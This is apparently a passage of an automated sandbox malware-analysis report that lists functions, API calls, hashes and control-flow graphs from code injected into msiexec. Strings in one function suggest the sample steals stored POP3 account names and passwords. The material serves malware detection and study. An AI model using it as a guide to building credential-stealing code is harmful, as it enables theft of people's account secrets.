                                                                                                    • Snapshot File: hcaresult_9_2_21bd0000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                    • String ID:
                                                                                                    • API String ID: 1703294689-0
                                                                                                    • Opcode ID: 34e366fb6ff04c95dd2b757efff0b5eb9e0f1c645aa701587005ee713c093389
                                                                                                    • Instruction ID: a4b0af82eb70d4cd007feac4939e9010317d203eaeabd1dd49e7362dabe565c9
                                                                                                    • Opcode Fuzzy Hash: 34e366fb6ff04c95dd2b757efff0b5eb9e0f1c645aa701587005ee713c093389
                                                                                                    • Instruction Fuzzy Hash: D6E0B636140609AFCF0EAF64CE68A493F79EF9A381F504024FA458B561DB3AD942CB94
                                                                                                    Function 21BD6580 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.4597408288.0000000021BD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21BD0000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.4597385553.0000000021BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.4597408288.0000000021BE6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_21bd0000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: .
                                                                                                    • API String ID: 0-248832578
                                                                                                    • Opcode ID: a33828406dc501190a7d55dd33ecfe5232e9f9722bde796e211d959b17ae29f1
                                                                                                    • Instruction ID: a593705268c7d89c7971ca5254d15a59d2b83a416435621e5edfc92fc4cc9310
                                                                                                    • Opcode Fuzzy Hash: a33828406dc501190a7d55dd33ecfe5232e9f9722bde796e211d959b17ae29f1
                                                                                                    • Instruction Fuzzy Hash: 9E31E572900149AFDB1DCE78CC84EEA7BBDDF86314F4001ADF919D72A5E6319E458B90
                                                                                                    Function 21BD724E Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.4597408288.0000000021BD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21BD0000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.4597385553.0000000021BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.4597408288.0000000021BE6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_21bd0000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HeapProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 54951025-0
                                                                                                    • Opcode ID: 79e3f3b4b96b1b1dd763280e6d54bae6665f53ae31230d37861ebf3ae4270157
                                                                                                    • Instruction ID: 709d3f7f63ee8cbc56bdbace31c86893f97385386cfe72975bd41ce177132d1c
                                                                                                    • Opcode Fuzzy Hash: 79e3f3b4b96b1b1dd763280e6d54bae6665f53ae31230d37861ebf3ae4270157
                                                                                                    • Instruction Fuzzy Hash: E4A011302822028F83088F30823A20E3ABCAE8A2C0B0000A8E888C20A0EB2880008B00
                                                                                                    Function 21BD173A Relevance: 30.0, APIs: 5, Strings: 12, Instructions: 210COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 21BD1CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 21BD1D1B
                                                                                                      • Part of subcall function 21BD1CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 21BD1D37
                                                                                                      • Part of subcall function 21BD1CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21BD1D4B
                                                                                                    • _strlen.LIBCMT ref: 21BD1855
                                                                                                    • _strlen.LIBCMT ref: 21BD1869
                                                                                                    • _strlen.LIBCMT ref: 21BD188B
                                                                                                    • _strlen.LIBCMT ref: 21BD18AE
                                                                                                    • _strlen.LIBCMT ref: 21BD18C8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.4597408288.0000000021BD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21BD0000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.4597385553.0000000021BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.4597408288.0000000021BE6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_21bd0000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _strlen$File$CopyCreateDelete
                                                                                                    • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                                                    • API String ID: 3296212668-3023110444
                                                                                                    • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                    • Instruction ID: 8371833405e30cf2a14f86c75d26d6ab52569deaa7f6a785640143f5aec130bd
                                                                                                    • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                    • Instruction Fuzzy Hash: D861E473D00219AFEF1DCBA4C840BDEBBB9AF5E300F40419AD204A7250DB795A46CF56
                                                                                                    Function 21BD19B2 Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 218COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.4597408288.0000000021BD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21BD0000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.4597385553.0000000021BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.4597408288.0000000021BE6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_21bd0000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _strlen
                                                                                                    • String ID: %m$~$Gon~$~F@7$~dra
                                                                                                    • API String ID: 4218353326-230879103
                                                                                                    • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                    • Instruction ID: 36be6d3c675ca4366c0ab0d1be713f3e6df534c7f401e3143b01cdfbbe463833
                                                                                                    • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                    • Instruction Fuzzy Hash: 9271D472D0026A5FDF1DDBA49894ADE7BFC9B1D300F14409AE644E7241EA749B85CBA0
                                                                                                    Function 21BD7CC2 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 203 21bd7cc2-21bd7cd6 204 21bd7cd8-21bd7cdd 203->204 205 21bd7d44-21bd7d4c 203->205 204->205 206 21bd7cdf-21bd7ce4 204->206 207 21bd7d4e-21bd7d51 205->207 208 21bd7d93-21bd7dab call 21bd7e35 205->208 206->205 209 21bd7ce6-21bd7ce9 206->209 207->208 211 21bd7d53-21bd7d90 call 21bd571e * 4 207->211 217 21bd7dae-21bd7db5 208->217 209->205 212 21bd7ceb-21bd7cf3 209->212 211->208 215 21bd7d0d-21bd7d15 212->215 216 21bd7cf5-21bd7cf8 212->216 222 21bd7d2f-21bd7d43 call 21bd571e * 2 215->222 223 21bd7d17-21bd7d1a 215->223 216->215 219 21bd7cfa-21bd7d0c call 21bd571e call 21bd90ba 216->219 220 21bd7dd4-21bd7dd8 217->220 221 21bd7db7-21bd7dbb 217->221 219->215 231 21bd7dda-21bd7ddf 220->231 232 21bd7df0-21bd7dfc 220->232 227 21bd7dbd-21bd7dc0 221->227 228 21bd7dd1 221->228 222->205 223->222 229 21bd7d1c-21bd7d2e call 21bd571e call 21bd91b8 223->229 227->228 236 21bd7dc2-21bd7dd0 call 21bd571e * 2 227->236 228->220 229->222 239 21bd7ded 231->239 240 21bd7de1-21bd7de4 231->240 232->217 234 21bd7dfe-21bd7e0b call 21bd571e 232->234 236->228 239->232 240->239 247 21bd7de6-21bd7dec call 21bd571e 240->247 247->239
                                                                                                    APIs
                                                                                                    • ___free_lconv_mon.LIBCMT ref: 21BD7D06
                                                                                                      • Part of subcall function 21BD90BA: _free.LIBCMT ref: 21BD90D7
                                                                                                      • Part of subcall function 21BD90BA: _free.LIBCMT ref: 21BD90E9
                                                                                                      • Part of subcall function 21BD90BA: _free.LIBCMT ref: 21BD90FB
                                                                                                      • Part of subcall function 21BD90BA: _free.LIBCMT ref: 21BD910D
                                                                                                      • Part of subcall function 21BD90BA: _free.LIBCMT ref: 21BD911F
                                                                                                      • Part of subcall function 21BD90BA: _free.LIBCMT ref: 21BD9131
                                                                                                      • Part of subcall function 21BD90BA: _free.LIBCMT ref: 21BD9143
                                                                                                      • Part of subcall function 21BD90BA: _free.LIBCMT ref: 21BD9155
                                                                                                      • Part of subcall function 21BD90BA: _free.LIBCMT ref: 21BD9167
                                                                                                      • Part of subcall function 21BD90BA: _free.LIBCMT ref: 21BD9179
                                                                                                      • Part of subcall function 21BD90BA: _free.LIBCMT ref: 21BD918B
                                                                                                      • Part of subcall function 21BD90BA: _free.LIBCMT ref: 21BD919D
                                                                                                      • Part of subcall function 21BD90BA: _free.LIBCMT ref: 21BD91AF
                                                                                                    • _free.LIBCMT ref: 21BD7CFB
                                                                                                      • Part of subcall function 21BD571E: HeapFree.KERNEL32(00000000,00000000,?,21BD924F,?,00000000,?,00000000,?,21BD9276,?,00000007,?,?,21BD7E5A,?), ref: 21BD5734
                                                                                                      • Part of subcall function 21BD571E: GetLastError.KERNEL32(?,?,21BD924F,?,00000000,?,00000000,?,21BD9276,?,00000007,?,?,21BD7E5A,?,?), ref: 21BD5746
                                                                                                    • _free.LIBCMT ref: 21BD7D1D
                                                                                                    • _free.LIBCMT ref: 21BD7D32
                                                                                                    • _free.LIBCMT ref: 21BD7D3D
                                                                                                    • _free.LIBCMT ref: 21BD7D5F
                                                                                                    • _free.LIBCMT ref: 21BD7D72
                                                                                                    • _free.LIBCMT ref: 21BD7D80
                                                                                                    • _free.LIBCMT ref: 21BD7D8B
                                                                                                    • _free.LIBCMT ref: 21BD7DC3
                                                                                                    • _free.LIBCMT ref: 21BD7DCA
                                                                                                    • _free.LIBCMT ref: 21BD7DE7
                                                                                                    • _free.LIBCMT ref: 21BD7DFF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.4597408288.0000000021BD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21BD0000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.4597385553.0000000021BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.4597408288.0000000021BE6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_21bd0000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                    • String ID:
                                                                                                    • API String ID: 161543041-0
                                                                                                    • Opcode ID: 593656c921360c357da55ca7fb46f8674c8c8c323e8bd6c847f7682c0fbb7ba0
                                                                                                    • Instruction ID: e6b83eaecef39d46d3678604031e8c4ea40ab63c9f40b17c8c8c92d6d38214d7
                                                                                                    • Opcode Fuzzy Hash: 593656c921360c357da55ca7fb46f8674c8c8c323e8bd6c847f7682c0fbb7ba0
                                                                                                    • Instruction Fuzzy Hash: D1311B73600206EFEB2DDE39D944FA67BF9EF05318F215469E849D7561DA31A980CB10
                                                                                                    Function 21BD59D6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 21BD59EA
                                                                                                      • Part of subcall function 21BD571E: HeapFree.KERNEL32(00000000,00000000,?,21BD924F,?,00000000,?,00000000,?,21BD9276,?,00000007,?,?,21BD7E5A,?), ref: 21BD5734
                                                                                                      • Part of subcall function 21BD571E: GetLastError.KERNEL32(?,?,21BD924F,?,00000000,?,00000000,?,21BD9276,?,00000007,?,?,21BD7E5A,?,?), ref: 21BD5746
                                                                                                    • _free.LIBCMT ref: 21BD59F6
                                                                                                    • _free.LIBCMT ref: 21BD5A01
                                                                                                    • _free.LIBCMT ref: 21BD5A0C
                                                                                                    • _free.LIBCMT ref: 21BD5A17
                                                                                                    • _free.LIBCMT ref: 21BD5A22
                                                                                                    • _free.LIBCMT ref: 21BD5A2D
                                                                                                    • _free.LIBCMT ref: 21BD5A38
                                                                                                    • _free.LIBCMT ref: 21BD5A43
                                                                                                    • _free.LIBCMT ref: 21BD5A51
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.4597408288.0000000021BD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21BD0000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.4597385553.0000000021BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.4597408288.0000000021BE6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_21bd0000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 776569668-0
                                                                                                    • Opcode ID: 7139f46063e01d959fc147f300758dde3116fc2f5f432f94035b9cd1025b277d
                                                                                                    • Instruction ID: 1296b72e613e69d492e23fdc1274de2075df3b322cc2f22cfc7385a9b155f7d1
                                                                                                    • Opcode Fuzzy Hash: 7139f46063e01d959fc147f300758dde3116fc2f5f432f94035b9cd1025b277d
                                                                                                    • Instruction Fuzzy Hash: 9711727A520149EFCF19DF94C841CDD3FB9EF18350F6691A5BA088B225DA32EA509B80
                                                                                                    Function 21BD1CCA Relevance: 13.6, APIs: 9, Instructions: 84fileCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 21BD1D1B
                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 21BD1D37
                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21BD1D4B
                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21BD1D58
                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21BD1D72
                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21BD1D7D
                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21BD1D8A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.4597408288.0000000021BD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21BD0000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.4597385553.0000000021BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.4597408288.0000000021BE6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_21bd0000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                                                    • String ID:
                                                                                                    • API String ID: 1454806937-0
                                                                                                    • Opcode ID: b06fa12c90339af2981aded4371347dad3424f323e9ab5ca8a97a640158e899f
                                                                                                    • Instruction ID: f4b7979c2ebf257615af698173dd22a4a8ed89f0b49859a40c5d3867a001da4f
                                                                                                    • Opcode Fuzzy Hash: b06fa12c90339af2981aded4371347dad3424f323e9ab5ca8a97a640158e899f
                                                                                                    • Instruction Fuzzy Hash: 63214CB298121CAFEB19DBA08C9CEEA7ABCEF5D384F0005A5F555D3180D7749E458B70
                                                                                                    Function 21BD9492 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 304 21bd9492-21bd94ef GetConsoleCP 305 21bd94f5-21bd9511 304->305 306 21bd9632-21bd9644 call 21bd2ada 304->306 307 21bd952c-21bd953d call 21bd7c19 305->307 308 21bd9513-21bd952a 305->308 315 21bd953f-21bd9542 307->315 316 21bd9563-21bd9565 307->316 310 21bd9566-21bd9575 call 21bd79e6 308->310 310->306 320 21bd957b-21bd959b WideCharToMultiByte 310->320 318 21bd9609-21bd9628 315->318 319 21bd9548-21bd955a call 21bd79e6 315->319 316->310 318->306 319->306 327 21bd9560-21bd9561 319->327 320->306 321 21bd95a1-21bd95b7 WriteFile 320->321 323 21bd95b9-21bd95ca 321->323 324 21bd962a-21bd9630 GetLastError 321->324 323->306 326 21bd95cc-21bd95d0 323->326 324->306 328 21bd95fe-21bd9601 326->328 329 21bd95d2-21bd95f0 WriteFile 326->329 327->320 328->305 331 21bd9607 328->331 329->324 330 21bd95f2-21bd95f6 329->330 330->306 332 21bd95f8-21bd95fb 330->332 331->306 332->328
                                                                                                    APIs
                                                                                                    • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,21BD9C07,?,00000000,?,00000000,00000000), ref: 21BD94D4
                                                                                                    • __fassign.LIBCMT ref: 21BD954F
                                                                                                    • __fassign.LIBCMT ref: 21BD956A
                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 21BD9590
                                                                                                    • WriteFile.KERNEL32(?,?,00000000,21BD9C07,00000000,?,?,?,?,?,?,?,?,?,21BD9C07,?), ref: 21BD95AF
                                                                                                    • WriteFile.KERNEL32(?,?,00000001,21BD9C07,00000000,?,?,?,?,?,?,?,?,?,21BD9C07,?), ref: 21BD95E8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.4597408288.0000000021BD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21BD0000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.4597385553.0000000021BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.4597408288.0000000021BE6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_21bd0000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                    • String ID:
                                                                                                    • API String ID: 1324828854-0
                                                                                                    • Opcode ID: 2d8621262b19c00fa07f361d12aa93871d14bd1c1aee8dc1bf63f192e1688721
                                                                                                    • Instruction ID: c2bba5dd94e75dee7953fdc719d8a8151d3222608231d769be613ceca099f3b5
                                                                                                    • Opcode Fuzzy Hash: 2d8621262b19c00fa07f361d12aa93871d14bd1c1aee8dc1bf63f192e1688721
                                                                                                    • Instruction Fuzzy Hash: 0251B372D40249AFDB08CFA8C895AEEBBF8EF0D310F14415AF955E7295E7309941CB60
                                                                                                    Function 21BD3370 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 333 21bd3370-21bd33b5 call 21bd3330 call 21bd37a7 338 21bd33b7-21bd33c9 333->338 339 21bd3416-21bd3419 333->339 340 21bd3439-21bd3442 338->340 341 21bd33cb 338->341 339->340 342 21bd341b-21bd3428 call 21bd3790 339->342 343 21bd33d0-21bd33e7 341->343 345 21bd342d-21bd3436 call 21bd3330 342->345 346 21bd33fd 343->346 347 21bd33e9-21bd33f7 call 21bd3740 343->347 345->340 350 21bd3400-21bd3405 346->350 354 21bd340d-21bd3414 347->354 355 21bd33f9 347->355 350->343 353 21bd3407-21bd3409 350->353 353->340 356 21bd340b 353->356 354->345 357 21bd33fb 355->357 358 21bd3443-21bd344c 355->358 356->345 357->350 359 21bd344e-21bd3455 358->359 360 21bd3486-21bd3496 call 21bd3774 358->360 359->360 362 21bd3457-21bd3466 call 21bdbbe0 359->362 365 21bd3498-21bd34a7 call 21bd3790 360->365 366 21bd34aa-21bd34c6 call 21bd3330 call 21bd3758 360->366 370 21bd3468-21bd3480 362->370 371 21bd3483 362->371 365->366 370->371 371->360
                                                                                                    APIs
                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 21BD339B
                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 21BD33A3
                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 21BD3431
                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 21BD345C
                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 21BD34B1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.4597408288.0000000021BD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21BD0000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.4597385553.0000000021BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.4597408288.0000000021BE6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_21bd0000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                    • String ID: csm
                                                                                                    • API String ID: 1170836740-1018135373
                                                                                                    • Opcode ID: 4781dd52df31b38f620bc3cd28122e21f38b4a54da1ca922a667128596e6344f
                                                                                                    • Instruction ID: afd2e516bb410083a3c7f7f4626779cace117b17503378e9aeba853d6be6bb78
                                                                                                    • Opcode Fuzzy Hash: 4781dd52df31b38f620bc3cd28122e21f38b4a54da1ca922a667128596e6344f
                                                                                                    • Instruction Fuzzy Hash: 0241B5BAA002099BCF0DCF68C884A9FBFB5EF46324F108159D9145B372D7359A01CF91
                                                                                                    Function 21BD925D Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 21BD9221: _free.LIBCMT ref: 21BD924A
                                                                                                    • _free.LIBCMT ref: 21BD92AB
                                                                                                      • Part of subcall function 21BD571E: HeapFree.KERNEL32(00000000,00000000,?,21BD924F,?,00000000,?,00000000,?,21BD9276,?,00000007,?,?,21BD7E5A,?), ref: 21BD5734
                                                                                                      • Part of subcall function 21BD571E: GetLastError.KERNEL32(?,?,21BD924F,?,00000000,?,00000000,?,21BD9276,?,00000007,?,?,21BD7E5A,?,?), ref: 21BD5746
                                                                                                    • _free.LIBCMT ref: 21BD92B6
                                                                                                    • _free.LIBCMT ref: 21BD92C1
                                                                                                    • _free.LIBCMT ref: 21BD9315
                                                                                                    • _free.LIBCMT ref: 21BD9320
                                                                                                    • _free.LIBCMT ref: 21BD932B
                                                                                                    • _free.LIBCMT ref: 21BD9336
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.4597408288.0000000021BD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21BD0000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.4597385553.0000000021BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.4597408288.0000000021BE6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_21bd0000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 776569668-0
                                                                                                    • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                    • Instruction ID: 06e367d07d1bc561556e8de842bb6a129cbaf14287a6d2a47c321a4e7f3b0f06
                                                                                                    • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                    • Instruction Fuzzy Hash: FA111C73540B09EEDE2CEFB0DC46FCB7BBDAF1C700F404825A699B6096DA65B5048751
                                                                                                    Function 21BD8821 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 415 21bd8821-21bd883a 416 21bd883c-21bd884c call 21bd9341 415->416 417 21bd8850-21bd8855 415->417 416->417 424 21bd884e 416->424 419 21bd8857-21bd885f 417->419 420 21bd8862-21bd8886 MultiByteToWideChar 417->420 419->420 422 21bd888c-21bd8898 420->422 423 21bd8a19-21bd8a2c call 21bd2ada 420->423 425 21bd88ec 422->425 426 21bd889a-21bd88ab 422->426 424->417 428 21bd88ee-21bd88f0 425->428 429 21bd88ad-21bd88bc call 21bdbf20 426->429 430 21bd88ca-21bd88db call 21bd56d0 426->430 432 21bd8a0e 428->432 433 21bd88f6-21bd8909 MultiByteToWideChar 428->433 429->432 443 21bd88c2-21bd88c8 429->443 430->432 440 21bd88e1 430->440 438 21bd8a10-21bd8a17 call 21bd8801 432->438 433->432 437 21bd890f-21bd892a call 21bd5f19 433->437 437->432 447 21bd8930-21bd8937 437->447 438->423 444 21bd88e7-21bd88ea 440->444 443->444 444->428 448 21bd8939-21bd893e 447->448 449 21bd8971-21bd897d 447->449 448->438 452 21bd8944-21bd8946 448->452 450 21bd897f-21bd8990 449->450 451 21bd89c9 449->451 453 21bd89ab-21bd89bc call 21bd56d0 450->453 454 21bd8992-21bd89a1 call 21bdbf20 450->454 455 21bd89cb-21bd89cd 451->455 452->432 456 21bd894c-21bd8966 call 21bd5f19 452->456 460 21bd8a07-21bd8a0d call 21bd8801 453->460 469 21bd89be 453->469 454->460 467 21bd89a3-21bd89a9 454->467 459 21bd89cf-21bd89e8 call 21bd5f19 455->459 455->460 456->438 471 21bd896c 456->471 459->460 472 21bd89ea-21bd89f1 459->472 460->432 473 21bd89c4-21bd89c7 467->473 469->473 471->432 474 21bd8a2d-21bd8a33 472->474 475 21bd89f3-21bd89f4 472->475 473->455 476 21bd89f5-21bd8a05 WideCharToMultiByte 474->476 475->476 476->460 477 21bd8a35-21bd8a3c call 21bd8801 476->477 477->438
                                                                                                    APIs
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,21BD6FFD,00000000,?,?,?,21BD8A72,?,?,00000100), ref: 21BD887B
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,21BD8A72,?,?,00000100,5EFC4D8B,?,?), ref: 21BD8901
                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 21BD89FB
                                                                                                    • __freea.LIBCMT ref: 21BD8A08
                                                                                                      • Part of subcall function 21BD56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 21BD5702
                                                                                                    • __freea.LIBCMT ref: 21BD8A11
                                                                                                    • __freea.LIBCMT ref: 21BD8A36
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.4597408288.0000000021BD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21BD0000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.4597385553.0000000021BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.4597408288.0000000021BE6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_21bd0000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 1414292761-0
                                                                                                    • Opcode ID: 7755ec29689755b29b83a0138bd279da56c7930c3833ca86350cf5e0f76ae520
                                                                                                    • Instruction ID: eddaa3c940dd21dc3aaae373df379388dd03bb4b3947228ca16030dcebb108c5
                                                                                                    • Opcode Fuzzy Hash: 7755ec29689755b29b83a0138bd279da56c7930c3833ca86350cf5e0f76ae520
                                                                                                    • Instruction Fuzzy Hash: B551CD73610216AEEF1DCE60CC81EAB3BBAEB45B51F110679F904D6194EB35DC5087A1
                                                                                                    Function 21BD15DA Relevance: 9.1, APIs: 6, Instructions: 84stringCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • _strlen.LIBCMT ref: 21BD1607
                                                                                                    • _strcat.LIBCMT ref: 21BD161D
                                                                                                    • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,21BD190E,?,?,00000000,?,00000000), ref: 21BD1643
